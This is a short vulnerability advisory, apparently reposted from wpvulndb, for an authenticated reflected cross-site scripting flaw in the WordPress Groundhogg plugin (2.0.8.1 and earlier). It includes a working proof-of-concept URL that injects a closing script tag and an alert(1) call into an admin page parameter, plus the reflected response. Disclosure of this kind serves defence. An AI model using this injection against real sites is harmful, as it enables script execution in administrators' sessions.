Proof of Concept
# Exploit Title: WordPress Groundhogg <= 2.0.8.1 Authenticated Reflected XSS Vulnerability # Date: 22-10-2019 # Exploit Author: Lucian Ioan Nitescu # Contact: https://twitter.com/LucianNitescu # Webiste: https://nitesculucian.github.io # Vendor Homepage: https://www.groundhogg.io/ # Software Link: https://wordpress.org/plugins/groundhogg/ # Version: 2.0.8.1 # Tested on: Ubuntu 18.04 / WordPress 5.3 1. Description: WordPress Groundhogg plugin with a version lower then 2.0.8.1 is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability. 2. Proof of Concept: Reflected Cross-site scripting (XSS) - Using an WordPress user, access < your_target > /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts<%2Fscript><script>alert(1)<%2Fscript> - The response will contain: bulk_action: 'groundhogg/bulk_job/gh_export_contacts</script><script>alert(1)</script>/ajax', items: bp.getItems(), the_end: bp.isLastOfThem() }, 

First seen on: https://wpvulndb.com/vulnerabilities/9925

Share This: